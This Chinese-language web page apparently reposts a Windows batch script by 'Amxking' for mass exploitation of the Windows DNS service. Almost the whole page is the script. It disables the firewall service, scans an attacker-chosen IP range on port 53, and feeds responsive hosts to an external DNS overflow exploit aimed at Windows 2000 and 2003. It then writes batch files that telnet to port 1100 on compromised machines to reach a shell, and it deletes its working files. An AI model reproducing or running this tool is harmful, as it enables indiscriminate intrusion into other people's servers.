您好,登錄后才能下訂單哦!
這篇文章主要介紹DNS批量溢出的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
代碼如下:
@shift 1
@ setlocal
@ cls
@ color A
@ title DNS批量溢出個人版
@echo ================================================================================
@echo DNS批量溢出個人版
@echo BY Amxking
@echo 1.輸入您想溢出的IP段 格式:XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX
@echo=================================================================================
@ set /p input=1.輸入您想溢出的IP段:
@ echo %input%>>ip.txt
@ net stop sharedaccess
@ net start server
@echo ================================================================================
@set /p c=請選擇掃描方式: (1為TCP,2為syn):
@if "%c%"=="2" goto syn
@if "%c%"=="1" goto tcp
:syn
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s syn %%i %%j 53 /save
@ goto ip
:tcp
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s tcp %%i %%j 53 1000 /save
@ goto ip
:ip
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
@for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
@for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
@del ip.txt
@del s1.txt
@del s2.txt
@del Result.txt
@echo=================================================================================
@echo 等待溢出…………當出現類似203.80.19.6 1077 :Vulnerability OS:window 2003
@echo 為可以溢出的IP 203.80.19.6 為IP 1077為端口 2003 為系統類型
@echo 請把能溢出的保存為boot.txt 保存格式:IP 端口 系統 例如 58.34.125.200 1029 2003
@echo=================================================================================
@ FOR /F "eol= tokens=1 delims= " %%i in (s.txt) do %MYFILES%\dns -s %%i >>a.txt
@echo=================================================================================
@echo 請把能溢出的保存為boot.txt 保存格式:IP 端口 系統 例如 58.34.125.200 1029 2003
@echo=================================================================================
@pause
@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2000all %%i %%j
@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2003eng %%i %%j
@goto yichu
:yichu
@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt
@for /F "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat
@del s.txt
@del a.txt
@del 3.txt
@echo=================================================================================
@echo 運行生成的批處理 等待溢出…………
@echo=================================================================================
@pause
以上是“DNS批量溢出的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業(yè)資訊頻道!
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。